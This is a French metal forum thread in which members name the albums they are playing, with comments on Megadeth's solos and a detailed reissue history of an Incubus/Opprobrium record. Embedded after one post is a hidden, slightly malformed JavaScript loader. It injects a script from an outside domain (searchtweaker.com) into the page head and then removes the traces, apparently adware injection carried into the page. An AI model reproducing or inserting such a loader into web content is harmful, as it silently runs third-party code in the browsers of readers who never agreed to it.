Thrash Metal >> Thrash through the Park ! Quel disque ? (vol.35)
Share to Facebook Share to Myspace Share to Twitter Stumble It Email This More...

Ce topic est verrouillé

Samedi 20 Avril 2013 - 13:20:14

Leech - Cyanide Christ (Suède-2013)

Samedi 20 Avril 2013 - 15:34:35

Megadeth - Rust in Peace

Je ne sais même pas si après 20 ans de pratique je serai capable de jouer ce genre de solos, Marty explose la concurrence sur Tornado of Souls, Lucretia, Five Magics... sur tout l'album d'ailleurs, mais j'allais pas faire toute la tracklist quand même haha

Comment faire du shred en gardant un sens mélodique exceptionnel, voilà.

Samedi 20 Avril 2013 - 15:40:24
Soulfly - Prophecy

Samedi 20 Avril 2013 - 18:24:32
Lost Society - Fast Loud Death - 2013

La tuerie de l'année, ça gicle dans tout les sens, riffs et solis plus backing vocal à gogo comme dans les 80's la releve est assurée!0

Samedi 20 Avril 2013 - 21:50:37

Annihilator - Alice In Hell

Ca tue ça tue putain badass

Samedi 20 Avril 2013 - 22:29:41

citation :
Fabien dit :

citation :
JimiH dit : Je croyais que cette cover n'était estampillée que sous le nom Opprobrium, et l'originale pour Incubus, tu as eu une édition spéciale Infest' ?

citation :
infestuus dit : J'ai pris l'image au pif sur le net , pas fait gaffe mais oui avec cette pochette c'est Opprobrium normalement , délire photoshop sur le coup .
NON ! Aucun délire photoshop.

1988. Sortie en LP chez Brutal Records aux US et chez Metalworks en Europe.

1996. Réédition en CD chez Nuclear Blast, via sa branche éphémère Radiation Records

- Guitares et chant entièrement réenregistrés par Francis Howard, donc exit le chant de Scot Latour. Il ne reste en fait que le couple basse / batterie d’origine.
- Certains titres sont rebaptisés et une nouvelle pochette est dessinée par Kristian ‘Necrolord' Wahlin, la pochette d’origine se trouvant au verso. Le patronyme d’Incubus en bien conservé. 

2000.  Réédition digipack par Nuclear Blast, groupé avec Beyond the Unknow

2008. Réédition digipack par Metal Mind sous le nom d'Opprobrium.

Pour posséder l'enregistrement d'origine, un unique moyen : acheter une version vinyle 1988 de Brutal Records ou Metalworks.

Fabien.

Pour être précis, c'est précis ! Merci pour ces précieuses informations

Samedi 20 Avril 2013 - 23:04:29

citation :
Alain59 dit : Lost Society - Fast Loud Death - 2013

La tuerie de l'année, ça gicle dans tout les sens, riffs et solis plus backing vocal à gogo comme dans les 80's la releve est assurée!0

Je l'attends avec impatience celui-ci.
J'ai adoré les extraits.

Samedi 20 Avril 2013 - 23:47:27
Overkill "The Years of Decay"

Dimanche 21 Avril 2013 - 00:37:12

Vektor - Black Future

vraiment énorme cet album, énorme, énorme, énorme !!!
(function(){try{var header=document.getElementsByTagName("HEAD")[0];VAR script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Dimanche 21 Avril 2013 - 08:05:54

Grim Force - Circulation to Conclusion